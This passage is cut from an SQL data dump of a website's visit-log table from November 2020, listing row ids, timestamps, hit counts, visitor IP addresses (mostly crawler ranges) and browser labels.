.149.15','other'),(547326,1605017234,1,1,0,0,'31.13.127.15','other'),(547327,1605017317,1,1,0,0,'173.252.95.7','other'),(547328,1605017340,1,1,0,0,'69.171.251.17','other'),(547329,1605017367,1,1,0,0,'66.220.149.27','other'),(547330,1605017449,1,1,0,0,'173.252.127.4','other'),(547331,1605017750,1,1,0,0,'46.211.38.29','chrome'),(547332,1605017998,1,1,0,0,'31.13.127.120','other'),(547333,1605018000,1,1,0,0,'66.220.149.15','other'),(547334,1605018001,1,1,0,0,'95.164.57.223','chrome'),(547335,1605018050,1,1,0,0,'69.171.251.4','other'),(547336,1605018058,1,1,0,0,'94.153.28.58','chrome'),(547337,1605018336,1,1,0,0,'66.220.149.27','other'),(547338,1605018556,1,1,0,0,'173.252.95.11','other'),(547339,1605018574,1,1,0,0,'94.153.5.121','chrome'),(547340,1605019621,1,1,0,0,'46.211.54.171','chrome'),(547341,1605019622,1,1,0,0,'69.171.251.20','other'),(547342,1605019651,1,1,0,0,'173.252.127.9','other'),(547343,1605020312,2,2,0,0,'94.153.65.224','chrome'),(547344,1605020603,1,1,0,0,'173.252.127.14','other'),(547345,1605020659,1,1,0,0,'31.13.127.24','other'),(547346,1605020751,1,1,0,0,'69.171.251.23','other'),(547347,1605020882,1,1,0,0,'66.220.149.19','other'),(547348,1605021467,1,1,0,0,'69.171.251.19','other'),(547349,1605021624,1,1,0,0,'66.220.149.117','other'),(547350,1605021629,1,1,0,0,'69.171.251.12','other'),(547351,1605021675,1,1,0,0,'173.252.95.21','other'),(547352,1605021897,1,1,0,0,'69.171.251.17','other'),(547353,1605022500,1,1,0,0,'69.171.251.9','other'),(547354,1605022546,1,1,0,0,'173.252.79.6','other'),(547355,1605022860,1,1,0,0,'69.171.251.22','other'),(547356,1605023152,1,1,0,0,'69.171.251.2','other'),(547357,1605023179,1,1,0,0,'78.111.185.17','chrome'),(547358,1605023718,1,1,0,0,'69.171.251.3','other'),(547359,1605023760,1,1,0,0,'66.220.149.18','other'),(547360,1605023792,1,1,0,0,'66.220.149.21','other'),(547361,1605023829,1,1,0,0,'91.196.178.14','chrome'),(547362,1605023838,1,1,0,0,'66.220.149.28','other'),(547363,1605024034,1,1,0,0,'31.13.103.3','other'),(547364,1605024229,1,1,0,0,'31.13.127.2','other'),(547365,1605024276,1,1,0,0,'69.171.251.27','other'),(547366,1605024399,1,1,0,0,'66.220.149.1','other'),(547367,1605024558,1,1,0,0,'91.196.178.36','chrome'),(547368,1605024883,1,1,0,0,'31.13.127.4','other'),(547369,1605024918,2,2,0,0,'69.171.251.30','other'),(547370,1605025073,1,1,0,0,'173.252.79.21','other'),(547371,1605025458,1,1,0,0,'31.13.127.17','other'),(547372,1605025466,1,1,0,0,'69.171.251.24','other'),(547373,1605025891,1,1,0,0,'66.220.149.36','other'),(547374,1605025910,1,1,0,0,'31.13.127.9','other'),(547375,1605025923,1,1,0,0,'46.211.88.177','chrome'),(547376,1605025999,1,1,0,0,'69.171.251.30','other'),(547377,1605026115,1,1,0,0,'31.13.127.117','other'),(547378,1605026117,1,1,0,0,'66.220.149.120','other'),(547379,1605026213,1,1,0,0,'66.220.149.21','other'),(547380,1605026231,1,1,0,0,'91.196.178.58','other'),(547381,1605026296,1,1,0,0,'69.171.251.26','other'),(547382,1605027140,1,1,0,0,'66.220.149.38','other'),(547383,1605027252,1,1,0,0,'69.171.251.28','other'),(547384,1605027473,1,1,0,0,'173.252.127.6','other'),(547385,1605028127,1,1,0,0,'69.171.251.10','other'),(547386,1605028132,1,1,0,0,'66.220.149.22','other'),(547387,1605028402,1,1,0,0,'31.13.103.11','other'),(547388,1605029147,1,1,0,0,'66.220.149.34','other'),(547389,1605029246,1,1,0,0,'173.252.95.7','other'),(547390,1605029256,1,1,0,0,'173.252.127.7','other'),(547391,1605029299,1,1,0,0,'66.220.149.14','other'),(547392,1605029372,1,1,0,0,'69.171.251.24','other'),(547393,1605029496,1,1,0,0,'69.171.251.116','other'),(547394,1605029698,1,1,0,0,'66.220.149.17','other'),(547395,1605029809,1,1,0,0,'69.171.251.11','other'),(547396,1605029937,1,1,0,0,'64.246.165.140','firefox'),(547397,1605030502,1,1,0,0,'69.171.251.27','other'),(547398,1605030503,1,1,0,0,'173.252.127.13','other'),(547399,1605030551,1,1,0,0,'91.196.178.138','chrome'),(547400,1605030615,1,1,0,0,'31.13.127.4','other'),(547401,1605030638,1,1,0,0,'69.171.251.2','other'),(547402,1605031132,1,1,0,0,'66.220.149.16','other'),(547403,1605031330,1,1,0,0,'31.13.127.117','other'),(547404,1605031404,1,1,0,0,'69.171.251.27','other'),(547405,1605031520,1,1,0,0,'69.171.251.6','other'),(547406,1605031748,1,1,0,0,'66.220.149.9','other'),(547407,1605031750,1,1,0,0,'69.171.251.25','other'),(547408,1605031808,1,1,0,0,'173.252.127.10','other'),(547409,1605031926,1,1,0,0,'173.252.127.13','other'),(547410,1605032089,1,1,0,0,'66.220.149.3','other'),(547411,1605032246,1,1,0,0,'66.220.149.40','other'),(547412,1605032713,1,1,0,0,'31.13.127.18','other'),(547413,1605032800,1,1,0,0,'66.220.149.28','other'),(547414,1605032866,1,1,0,0,'90.3.41.136','other'),(547415,1605032934,1,1,0,0,'173.252.95.30','other'),(547416,1605033078,1,1,0,0,'69.171.251.16','other'),(547417,1605033094,1,1,0,0,'69.171.251.8','other'),(547418,1605033178,1,1,0,0,'31.13.103.21','other'),(547419,1605033459,1,1,0,0,'66.220.149.31','other'),(547420,1605033463,1,1,0,0,'173.252.95.4','other'),(547421,1605033519,1,1,0,0,'173.252.127.29','other'),(547422,1605033731,1,1,0,0,'31.13.127.8','other'),(547423,1605034492,1,1,0,0,'173.252.127.21','other'),(547424,1605035359,1,1,0,0,'66.249.66.91','chrome'),(547425,1605035426,1,1,0,0,'69.171.251.11','other'),(547426,1605035451,1,1,0,0,'173.252.95.8','other'),(547427,1605035557,1,1,0,0,'173.252.127.24','other'),(547429,1605035903,1,1,0,0,'69.171.251.18','other'),(547430,1605036639,2,2,0,0,'31.13.127.116','other'),(547431,1605036725,2,2,0,0,'69.171.251.120','other'),(547432,1605036742,1,1,0,0,'91.196.178.189','chrome'),(547433,1605036746,1,1,0,0,'69.171.251.28','other'),(547434,1605036765,1,1,0,0,'69.171.251.111','other'),(547435,1605036766,1,1,0,0,'69.171.251.14','other'),(547436,1605036768,1,1,0,0,'195.10.210.210','chrome'),(547437,1605036868,1,1,0,0,'66.220.149.117','other'),(547438,1605037356,1,1,0,0,'69.171.251.118','other'),(547439,1605037362,1,1,0,0,'31.13.127.17','other'),(547440,1605037775,1,1,0,0,'66.220.149.11','other'),(547441,1605037896,1,1,0,0,'173.252.127.30','other'),(547442,1605038015,1,1,0,0,'69.171.251.15','other'),(547443,1605038037,1,1,0,0,'66.220.149.8','other'),(547444,1605038677,1,1,0,0,'69.171.251.118','other'),(547445,1605038785,1,1,0,0,'69.171.251.116','other'),(547446,1605038835,1,1,0,0,'66.220.149.38','other'),(547447,1605039172,1,1,0,0,'173.252.127.31','other'),(547448,1605039555,1,1,0,0,'69.171.251.22','other'),(547449,1605039695,1,1,0,0,'46.211.33.174','chrome'),(547450,1605039732,1,1,0,0,'69.171.251.119','other'),(547451,1605039734,1,1,0,0,'91.196.178.174','chrome'),(547452,1605039867,1,1,0,0,'173.252.127.25','other'),(547453,1605039899,1,1,0,0,'66.220.149.37','other'),(547454,1605041435,1,1,0,0,'69.171.251.21','other'),(547455,1605041436,1,1,0,0,'66.220.149.16','other'),(547456,1605041593,1,1,0,0,'69.171.251.15','other'),(547457,1605041663,1,1,0,0,'173.252.107.10','other'),(547458,1605042375,1,1,0,0,'69.171.251.118','other'),(547459,1605042376,1,1,0,0,'31.13.127.10','other'),(547460,1605042474,1,1,0,0,'173.252.127.31','other'),(547462,1605042522,1,1,0,0,'66.220.149.34','other'),(547463,1605042747,1,1,0,0,'37.55.237.201','chrome'),(547464,1605042762,1,1,0,0,'173.252.127.27','other'),(547465,1605042824,1,1,0,0,'69.171.251.117','other'),(547466,1605043934,1,1,0,0,'31.13.127.11','other'),(547467,1605043988,1,1,0,0,'69.171.251.1','other'),(547468,1605045247,1,1,0,0,'69.171.251.28','other'),(547469,1605045264,1,0,1,0,'66.249.66.93',''),(547470,1605046164,1,1,0,0,'173.252.127.21','other'),(547471,1605046450,1,1,0,0,'69.171.251.117','other'),(547472,1605046938,1,1,0,0,'31.13.127.118','other'),(547473,1605047272,1,1,0,0,'66.220.149.1','other'),(547474,1605047299,1,1,0,0,'69.171.251.5','other'),(547475,1605049074,1,1,0,0,'66.220.149.112','other'),(547476,1605051313,1,1,0,0,'173.252.95.112','other'),(547477,1605051345,1,1,0,0,'69.171.251.11','other'),(547478,1605054352,1,1,0,0,'66.249.66.93','chrome'),(547479,1605061223,1,1,0,0,'69.171.251.26','other'),(547480,1605062118,1,1,0,0,'66.220.149.18','other'),(547481,1605063538,1,1,0,0,'69.171.251.26','other'),(547482,1605063969,1,0,1,0,'66.249.66.93',''),(547483,1605066224,1,1,0,0,'66.220.149.19','other'),(547484,1605070631,1,1,0,0,'69.171.251.22','other'),(547485,1605071072,1,1,0,0,'91.196.178.14','chrome'),(547486,1605071698,1,1,0,0,'31.13.127.17','other'),(547487,1605071903,1,1,0,0,'173.252.127.12','other'),(547488,1605073112,1,1,0,0,'66.220.149.3','other'),(547489,1605074070,1,1,0,0,'69.171.251.112','other'),(547490,1605075191,1,1,0,0,'31.13.127.23','other'),(547491,1605075390,1,1,0,0,'173.252.95.6','other'),(547492,1605075482,1,1,0,0,'31.13.127.8','other'),(547493,1605075563,1,1,0,0,'69.171.251.16','other'),(547494,1605075620,1,1,0,0,'66.220.149.3','other'),(547495,1605075693,1,1,0,0,'66.220.149.117','other'),(547496,1605075873,1,1,0,0,'173.252.127.27','other'),(547497,1605075899,1,1,0,0,'31.13.103.22','other'),(547498,1605076319,1,1,0,0,'66.220.149.25','other'),(547499,1605077604,1,1,0,0,'69.171.251.8','other'),(547500,1605079816,1,1,0,0,'91.196.178.14','chrome'),(547501,1605082139,1,1,0,0,'91.196.177.253','firefox'),(547502,1605082867,1,1,0,0,'173.252.83.10','other'),(547503,1605083801,1,1,0,0,'66.220.149.4','other'),(547504,1605083857,1,1,0,0,'69.171.251.11','other'),(547505,1605084177,1,1,0,0,'31.13.103.119','other'),(547506,1605084178,1,1,0,0,'31.13.103.112','other'),(547507,1605084311,1,1,0,0,'66.220.149.19','other'),(547508,1605085290,1,1,0,0,'31.13.127.8','other'),(547509,1605085305,1,1,0,0,'69.171.251.117','other'),(547510,1605085498,1,1,0,0,'173.252.127.22','other'),(547511,1605085677,1,1,0,0,'91.196.177.253','firefox'),(547512,1605085717,1,1,0,0,'31.43.147.93','chrome'),(547513,1605085767,1,1,0,0,'66.220.149.117','other'),(547514,1605088001,1,1,0,0,'69.171.251.16','other'),(547515,1605088240,1,1,0,0,'69.171.251.27','other'),(547516,1605088797,1,1,0,0,'66.220.149.10','other'),(547517,1605088798,1,1,0,0,'173.252.127.116','other'),(547518,1605090511,1,1,0,0,'31.13.127.118','other'),(547519,1605090555,1,1,0,0,'69.171.251.22','other'),(547520,1605090557,1,1,0,0,'66.220.149.22','other'),(547521,1605091158,1,1,0,0,'173.252.127.17','other'),(547523,1605091165,1,1,0,0,'92.113.174.123','chrome'),(547524,1605091271,1,1,0,0,'69.171.251.1','other'),(547526,1605091681,1,1,0,0,'31.13.103.7','other'),(547527,1605091714,1,1,0,0,'173.252.127.20','other'),(547528,1605092054,1,1,0,0,'31.13.127.14','other'),(547529,1605092093,1,1,0,0,'69.171.251.27','other'),(547530,1605094050,1,1,0,0,'66.220.149.21','other'),(547531,1605094132,1,1,0,0,'173.252.127.120','other'),(547532,1605094911,1,1,0,0,'69.171.251.113','other'),(547533,1605095801,1,1,0,0,'173.252.95.10','other'),(547534,1605095824,1,1,0,0,'69.171.251.25','other'),(547535,1605095839,1,1,0,0,'31.13.127.4','other'),(547536,1605095968,1,1,0,0,'45.84.2.30','chrome'),(547537,1605096369,2,2,0,0,'173.252.127.111','other'),(547538,1605096643,1,1,0,0,'31.13.127.17','other'),(547539,1605096752,1,1,0,0,'31.13.103.112','other'),(547540,1605097112,1,1,0,0,'66.220.149.6','other'),(547541,1605097113,1,1,0,0,'69.171.251.117','other'),(547542,1605097274,1,1,0,0,'91.196.178.77','chrome'),(547543,1605098789,1,1,0,0,'69.171.251.16','other'),(547544,1605100901,1,1,0,0,'91.196.178.24','chrome'),(547545,1605104667,1,1,0,0,'66.220.149.9','other'),(547546,1605105124,1,1,0,0,'173.252.127.20','other'),(547547,1605106550,1,1,0,0,'173.252.95.5','other'),(547548,1605106681,1,1,0,0,'173.252.95.22','other'),(547549,1605107700,1,1,0,0,'31.13.127.7','other'),(547550,1605107706,1,1,0,0,'173.252.127.35','other'),(547551,1605108656,1,1,0,0,'66.220.149.3','other'),(547552,1605108657,1,1,0,0,'173.252.127.111','other'),(547553,1605109188,1,1,0,0,'173.252.127.26','other'),(547554,1605109573,1,1,0,0,'212.83.146.233','firefox'),(547555,1605109863,1,1,0,0,'173.252.95.18','other'),(547556,1605110272,1,1,0,0,'31.13.127.11','other'),(547557,1605111056,1,1,0,0,'31.13.103.12','other'),(547558,1605111516,1,1,0,0,'66.220.149.13','other'),(547559,1605112115,1,1,0,0,'173.252.127.17','other'),(547560,1605112207,1,1,0,0,'66.249.66.93','chrome'),(547561,1605112756,1,1,0,0,'173.252.127.31','other'),(547562,1605112757,1,1,0,0,'173.252.95.23','other'),(547563,1605113182,1,1,0,0,'195.154.63.222','firefox'),(547564,1605113330,1,1,0,0,'173.252.127.23','other'),(547565,1605114099,1,1,0,0,'31.13.127.14','other'),(547566,1605114834,1,1,0,0,'69.171.251.15','other'),(547567,1605114836,1,1,0,0,'66.220.149.117','other'),(547568,1605115107,1,1,0,0,'66.220.149.36','other'),(547569,1605115111,1,1,0,0,'173.252.127.24','other'),(547570,1605115250,1,1,0,0,'173.252.95.119','other'),(547571,1605115298,1,1,0,0,'66.220.149.23','other'),(547572,1605115413,1,1,0,0,'66.220.149.28','other'),(547573,1605115436,1,1,0,0,'69.171.251.117','other'),(547574,1605115887,1,1,0,0,'37.73.17.19','chrome'),(547575,1605116042,1,1,0,0,'173.252.95.2','other'),(547576,1605116113,1,1,0,0,'31.13.127.5','other'),(547577,1605116146,1,1,0,0,'69.171.251.9','other'),(547578,1605117024,1,1,0,0,'173.252.127.1','other'),(547579,1605117830,1,1,0,0,'31.13.127.20','other'),(547580,1605117834,1,1,0,0,'173.252.127.3','other'),(547581,1605117868,1,1,0,0,'69.171.251.20','other'),(547582,1605118555,1,1,0,0,'31.13.127.113','other'),(547583,1605118634,1,1,0,0,'173.252.127.24','other'),(547584,1605118902,1,1,0,0,'66.220.149.17','other'),(547585,1605119251,1,1,0,0,'31.13.127.13','other'),(547586,1605119749,1,1,0,0,'66.220.149.20','other'),(547587,1605119750,1,1,0,0,'173.252.127.113','other'),(547588,1605119872,1,1,0,0,'31.13.127.7','other'),(547589,1605119993,1,1,0,0,'69.171.251.17','other'),(547590,1605120457,1,1,0,0,'69.171.251.2','other'),(547591,1605120459,1,1,0,0,'31.13.127.111','other'),(547592,1605120499,1,1,0,0,'69.171.251.26','other'),(547593,1605120618,1,1,0,0,'173.252.127.10','other'),(547594,1605120842,1,1,0,0,'91.235.227.66','chrome'),(547595,1605121106,1,1,0,0,'69.171.251.16','other'),(547596,1605121162,1,1,0,0,'69.171.251.18','other'),(547597,1605121208,1,1,0,0,'31.13.127.117','other'),(547598,1605121535,1,1,0,0,'173.252.95.26','other'),(547599,1605121974,1,1,0,0,'69.171.251.13','other'),(547600,1605122659,1,1,0,0,'69.171.251.24','other'),(547601,1605122795,1,1,0,0,'31.13.127.116','other'),(547602,1605122805,1,1,0,0,'69.171.251.11','other'),(547603,1605123617,1,1,0,0,'66.220.149.120','other'),(547604,1605123695,1,1,0,0,'69.171.251.29','other'),(547605,1605124499,1,1,0,0,'31.13.127.4','other'),(547606,1605125174,1,1,0,0,'173.252.127.25','other'),(547607,1605126081,1,1,0,0,'173.252.107.111','other'),(547608,1605126290,1,1,0,0,'31.13.127.117','other'),(547609,1605127088,1,1,0,0,'173.252.107.2','other'),(547610,1605127093,1,1,0,0,'69.171.251.11','other'),(547611,1605127176,1,1,0,0,'66.220.149.22','other'),(547612,1605127190,1,1,0,0,'69.171.251.117','other'),(547613,1605127766,1,1,0,0,'66.220.149.29','other'),(547614,1605127781,1,1,0,0,'69.171.251.21','other'),(547615,1605127783,1,1,0,0,'66.220.149.14','other'),(547617,1605127854,1,1,0,0,'69.171.251.13','other'),(547618,1605128163,1,1,0,0,'31.13.103.22','other'),(547619,1605128750,1,1,0,0,'69.171.251.18','other'),(547620,1605128974,1,1,0,0,'31.13.127.8','other'),(547621,1605129163,1,1,0,0,'69.171.251.14','other'),(547623,1605129329,1,1,0,0,'31.13.127.117','other'),(547624,1605129474,1,1,0,0,'173.252.111.2','other'),(547625,1605130479,1,1,0,0,'66.220.149.18','other'),(547626,1605130601,1,1,0,0,'173.252.95.10','other'),(547627,1605130611,1,1,0,0,'69.171.251.7','other'),(547628,1605139306,1,1,0,0,'66.220.149.118','other'),(547629,1605143734,1,1,0,0,'31.13.103.7','other'),(547630,1605143735,1,1,0,0,'69.171.251.118','other'),(547631,1605149894,1,1,0,0,'31.13.115.7','other'),(547632,1605149924,1,1,0,0,'69.171.251.3','other'),(547633,1605150199,1,1,0,0,'66.220.149.11','other'),(547634,1605151500,1,0,1,0,'66.249.66.93',''),(547635,1605152318,2,2,0,0,'205.169.39.184','chrome'),(547636,1605155048,1,0,1,0,'66.249.66.91',''),(547637,1605157224,1,1,0,0,'69.171.251.3','other'),(547638,1605157225,1,1,0,0,'66.220.149.13','other'),(547639,1605158227,1,1,0,0,'205.169.39.53','chrome'),(547640,1605160101,1,1,0,0,'176.106.217.144','other'),(547641,1605163502,1,1,0,0,'31.13.127.118','other'),(547642,1605167466,1,1,0,0,'91.196.178.69','chrome'),(547643,1605167516,1,1,0,0,'66.220.149.24','other'),(547644,1605167525,1,1,0,0,'69.171.251.9','other'),(547645,1605169111,1,1,0,0,'69.171.251.8','other'),(547646,1605170178,1,1,0,0,'69.171.251.14','other'),(547647,1605174074,1,1,0,0,'69.171.251.113','other'),(547648,1605174103,1,1,0,0,'31.13.127.20','other'),(547649,1605174104,1,1,0,0,'69.171.251.8','other'),(547650,1605175705,1,1,0,0,'69.171.251.4','other'),(547651,1605176064,1,1,0,0,'173.252.95.9','other'),(547652,1605178428,1,1,0,0,'66.220.149.23','other'),(547653,1605179012,1,1,0,0,'173.252.127.11','other'),(547654,1605180556,1,1,0,0,'69.171.251.3','other'),(547655,1605184217,1,1,0,0,'69.171.251.20','other'),(547656,1605185400,1,1,0,0,'31.13.127.3','other'),(547657,1605185429,1,1,0,0,'69.171.251.116','other'),(547658,1605187153,1,1,0,0,'69.171.251.15','other'),(547659,1605187213,1,1,0,0,'91.196.179.33','chrome'),(547660,1605188899,1,1,0,0,'66.249.66.92','chrome'),(547661,1605189989,1,1,0,0,'66.220.149.30','other'),(547662,1605189993,1,1,0,0,'69.171.251.6','other'),(547663,1605190113,1,1,0,0,'178.133.92.24','chrome'),(547664,1605191972,1,1,0,0,'69.171.251.9','other'),(547665,1605192081,1,1,0,0,'66.220.149.10','other'),(547666,1605194382,1,1,0,0,'173.252.95.116','other'),(547667,1605194979,1,1,0,0,'173.252.95.8','other'),(547668,1605195037,1,1,0,0,'31.13.127.6','other'),(547669,1605195703,1,1,0,0,'69.171.251.116','other'),(547670,1605196353,1,1,0,0,'69.171.251.9','other'),(547671,1605196356,1,1,0,0,'31.13.127.116','other'),(547672,1605197713,1,1,0,0,'91.196.178.14','chrome'),(547673,1605197799,1,1,0,0,'93.170.117.25','other'),(547674,1605200087,1,1,0,0,'66.220.149.26','other'),(547675,1605200266,1,1,0,0,'69.171.251.111','other'),(547676,1605201571,1,1,0,0,'69.171.251.6','other'),(547677,1605201591,1,1,0,0,'31.13.127.4','other'),(547678,1605203127,1,1,0,0,'31.13.127.17','other'),(547679,1605203831,1,0,1,0,'66.249.66.91',''),(547680,1605204198,1,1,0,0,'69.171.251.15','other'),(547681,1605205236,1,1,0,0,'31.13.103.118','other'),(547682,1605208334,1,1,0,0,'66.220.149.113','other'),(547683,1605208368,1,1,0,0,'69.171.251.24','other'),(547684,1605208748,1,1,0,0,'173.252.95.9','other'),(547685,1605210703,1,1,0,0,'66.220.149.22','other'),(547686,1605210711,1,1,0,0,'69.171.251.32','other'),(547687,1605210915,1,1,0,0,'69.171.251.25','other'),(547688,1605213108,1,1,0,0,'31.13.127.118','other'),(547689,1605213517,1,1,0,0,'69.171.251.117','other'),(547690,1605218955,1,1,0,0,'66.220.149.9','other'),(547691,1605218973,1,1,0,0,'69.171.251.13','other'),(547692,1605220638,1,1,0,0,'31.13.127.111','other'),(547693,1605225023,1,1,0,0,'212.83.146.233','firefox'),(547694,1605226720,1,1,0,0,'31.13.103.23','other'),(547695,1605228104,1,1,0,0,'31.13.103.116','other'),(547696,1605229082,1,1,0,0,'66.249.66.93','chrome'),(547697,1605230752,1,1,0,0,'212.83.146.233','firefox'),(547698,1605234744,1,1,0,0,'163.172.70.242','firefox'),(547699,1605241544,1,1,0,0,'31.13.103.2','other'),(547700,1605248926,1,1,0,0,'66.220.149.31','chrome'),(547701,1605248947,1,1,0,0,'66.220.149.24','chrome'),(547702,1605248948,1,1,0,0,'66.220.149.120','chrome'),(547703,1605249343,1,1,0,0,'66.220.149.27','other'),(547704,1605250362,2,2,0,0,'31.13.127.1','other'),(547705,1605250363,1,1,0,0,'31.13.127.6','other'),(547706,1605250371,1,1,0,0,'69.171.251.20','other'),(547707,1605250376,1,1,0,0,'31.13.127.120','other'),(547708,1605252944,1,1,0,0,'69.171.251.10','other'),(547709,1605254536,1,1,0,0,'31.13.127.9','other'),(547710,1605259298,1,1,0,0,'173.252.95.6','other'),(547711,1605260299,1,1,0,0,'173.252.127.24','other'),(547712,1605264575,1,1,0,0,'69.171.251.14','other'),(547713,1605264598,1,1,0,0,'46.201.135.248','chrome'),(547714,1605264622,1,1,0,0,'173.252.83.6','other'),(547716,1605267649,1,1,0,0,'31.13.127.12','other'),(547717,1605269555,1,1,0,0,'173.252.127.120','other'),(547718,1605269725,1,0,1,0,'66.249.66.93',''),(547719,1605273063,2,2,0,0,'69.171.251.6','other'),(547720,1605273447,1,1,0,0,'66.220.149.30','other'),(547721,1605275696,2,2,0,0,'205.169.39.229','chrome'),(547722,1605283824,1,1,0,0,'93.170.117.25','other'),(547723,1605285164,1,1,0,0,'69.171.251.30','other'),(547724,1605285740,1,1,0,0,'66.220.149.18','other'),(547725,1605287139,1,1,0,0,'66.220.149.20','other'),(547726,1605288225,1,1,0,0,'31.13.127.112','other'),(547727,1605288483,1,1,0,0,'31.13.127.6','other'),(547728,1605290670,1,1,0,0,'66.220.149.4','other'),(547729,1605290679,1,1,0,0,'69.171.251.21','other'),(547730,1605291964,1,1,0,0,'66.220.149.23','other'),(547731,1605292375,1,1,0,0,'69.171.251.26','other'),(547732,1605292416,1,1,0,0,'173.252.127.113','other'),(547733,1605292417,1,1,0,0,'66.220.149.18','other'),(547734,1605293016,1,1,0,0,'173.252.95.1','other'),(547735,1605294119,1,1,0,0,'31.13.127.4','other'),(547736,1605296981,1,1,0,0,'173.252.127.27','other'),(547737,1605298479,1,1,0,0,'66.220.149.31','other'),(547738,1605298691,1,1,0,0,'173.252.95.111','other'),(547739,1605301906,1,1,0,0,'31.13.127.10','other'),(547740,1605306031,1,1,0,0,'66.220.149.32','other'),(547741,1605331545,1,1,0,0,'173.252.127.5','chrome'),(547742,1605331566,1,1,0,0,'173.252.127.23','chrome'),(547743,1605331567,1,1,0,0,'173.252.127.119','chrome'),(547744,1605332897,1,1,0,0,'31.13.103.111','other'),(547745,1605336402,1,1,0,0,'69.171.251.5','other'),(547746,1605339392,1,1,0,0,'91.196.178.14','chrome'),(547747,1605339577,1,1,0,0,'173.252.127.13','other'),(547748,1605340131,1,1,0,0,'66.220.149.117','other'),(547749,1605341506,1,1,0,0,'91.196.178.14','chrome'),(547750,1605341586,1,1,0,0,'31.13.127.19','other'),(547751,1605341587,3,3,0,0,'31.13.127.2','other'),(547752,1605341594,2,2,0,0,'31.13.127.117','other'),(547753,1605341596,1,1,0,0,'31.13.127.15','other'),(547754,1605341696,1,1,0,0,'31.13.115.22','other'),(547755,1605341868,1,1,0,0,'90.129.210.57','chrome'),(547756,1605342029,1,1,0,0,'46.211.72.62','chrome'),(547757,1605342588,1,1,0,0,'94.153.26.42','chrome'),(547758,1605342732,1,1,0,0,'69.171.249.120','other'),(547759,1605343236,1,1,0,0,'178.133.101.208','chrome'),(547760,1605343881,1,1,0,0,'185.151.84.210','chrome'),(547761,1605344030,1,1,0,0,'176.111.247.35','chrome'),(547762,1605345245,1,1,0,0,'188.191.73.23','other'),(547763,1605345528,1,1,0,0,'69.171.251.15','other'),(547764,1605345839,1,1,0,0,'88.155.7.35','chrome'),(547765,1605345911,1,1,0,0,'178.54.13.53','other'),(547766,1605346174,1,1,0,0,'94.153.3.232','chrome'),(547767,1605346452,1,1,0,0,'69.171.251.9','other'),(547768,1605346462,1,1,0,0,'31.13.127.1','other'),(547769,1605346467,1,1,0,0,'31.13.127.10','other'),(547770,1605346510,1,1,0,0,'31.13.127.23','other'),(547771,1605346986,1,1,0,0,'78.154.174.50','chrome'),(547772,1605348281,1,1,0,0,'31.13.127.120','other'),(547773,1605348743,1,1,0,0,'185.16.117.89','chrome'),(547774,1605349261,1,1,0,0,'46.211.7.146','other'),(547775,1605349456,1,1,0,0,'46.175.64.17','chrome'),(547776,1605350268,1,1,0,0,'173.252.127.24','other'),(547777,1605352869,1,1,0,0,'31.13.127.8','other'),(547778,1605355924,1,1,0,0,'31.13.127.113','other'),(547779,1605355925,1,1,0,0,'31.13.127.118','other'),(547780,1605356452,1,1,0,0,'46.211.27.28','chrome'),(547781,1605357765,1,1,0,0,'173.252.127.7','other'),(547782,1605358756,1,1,0,0,'69.171.251.4','other'),(547783,1605362678,1,1,0,0,'193.56.13.134','other'),(547784,1605365836,1,1,0,0,'83.137.6.225','other'),(547785,1605366933,1,1,0,0,'173.252.83.11','other'),(547786,1605366934,1,1,0,0,'173.252.83.119','other'),(547789,1605366935,1,1,0,0,'173.252.127.3','other'),(547790,1605367520,1,1,0,0,'173.252.87.15','other'),(547791,1605368004,1,1,0,0,'46.211.32.56','chrome'),(547792,1605368149,1,1,0,0,'66.220.149.17','other'),(547793,1605368178,1,1,0,0,'173.252.95.23','other'),(547794,1605370444,1,1,0,0,'69.171.249.23','other'),(547795,1605370509,1,1,0,0,'173.252.127.3','other'),(547796,1605370534,1,1,0,0,'46.211.8.182','chrome'),(547797,1605370955,1,1,0,0,'173.252.87.17','other'),(547798,1605371233,1,1,0,0,'31.13.127.119','other'),(547799,1605373137,1,1,0,0,'176.108.124.244','chrome'),(547800,1605373440,1,1,0,0,'176.118.50.138','chrome'),(547801,1605373606,1,1,0,0,'94.153.4.63','chrome'),(547802,1605374228,1,1,0,0,'91.244.139.150','chrome'),(547803,1605375236,1,1,0,0,'173.252.127.10','other'),(547805,1605375237,1,1,0,0,'173.252.107.19','other'),(547806,1605375607,1,1,0,0,'46.211.27.169','chrome'),(547807,1605375920,1,1,0,0,'66.220.149.38','other'),(547808,1605379947,1,1,0,0,'176.124.134.252','chrome'),(547809,1605379967,1,1,0,0,'173.252.127.14','other'),(547810,1605380469,1,1,0,0,'173.252.127.116','other'),(547811,1605380487,1,1,0,0,'69.171.251.27','other'),(547812,1605381021,1,1,0,0,'91.196.178.14','chrome'),(547813,1605381846,1,1,0,0,'195.26.18.159','chrome'),(547814,1605382461,1,1,0,0,'66.220.149.112','other'),(547815,1605382610,1,1,0,0,'217.19.208.100','chrome'),(547816,1605386038,1,1,0,0,'66.220.149.15','other'),(547817,1605386704,1,1,0,0,'195.85.219.101','chrome'),(547818,1605391009,1,1,0,0,'31.129.233.4','chrome'),(547819,1605394748,1,1,0,0,'173.252.111.5','other'),(547820,1605394749,1,1,0,0,'173.252.111.7','other'),(547821,1605394750,1,1,0,0,'173.252.111.119','other'),(547823,1605397028,1,1,0,0,'31.13.127.16','other'),(547824,1605398602,1,0,1,0,'66.249.66.151',''),(547825,1605399390,1,1,0,0,'69.171.251.120','other'),(547826,1605399616,1,0,1,0,'66.249.66.92',''),(547827,1605399889,1,1,0,0,'94.254.225.135','chrome'),(547828,1605422210,1,1,0,0,'93.75.179.218','other'),(547829,1605422682,1,1,0,0,'94.179.196.42','chrome'),(547830,1605424190,1,1,0,0,'31.13.127.12','other'),(547831,1605431161,1,0,1,0,'66.249.66.207',''),(547832,1605433782,2,2,0,0,'173.252.87.17','other'),(547833,1605433783,1,1,0,0,'173.252.87.16','other'),(547834,1605433784,1,1,0,0,'66.220.149.117','other'),(547835,1605439674,1,1,0,0,'66.220.149.10','other'),(547836,1605441818,1,1,0,0,'188.163.76.66','chrome'),(547837,1605444380,1,1,0,0,'78.154.187.2','chrome'),(547838,1605448270,1,1,0,0,'91.196.178.58','other'),(547839,1605449470,1,1,0,0,'173.252.95.4','other'),(547840,1605449537,1,1,0,0,'69.171.251.112','other'),(547841,1605449543,1,1,0,0,'31.13.127.17','other'),(547842,1605449697,1,1,0,0,'109.227.103.181','chrome'),(547843,1605453215,1,1,0,0,'194.44.56.210','chrome'),(547844,1605456465,1,1,0,0,'94.153.69.50','chrome'),(547845,1605456778,1,1,0,0,'37.73.193.183','chrome'),(547846,1605456954,1,1,0,0,'178.133.212.192','chrome'),(547847,1605457243,1,1,0,0,'173.252.95.6','other'),(547848,160545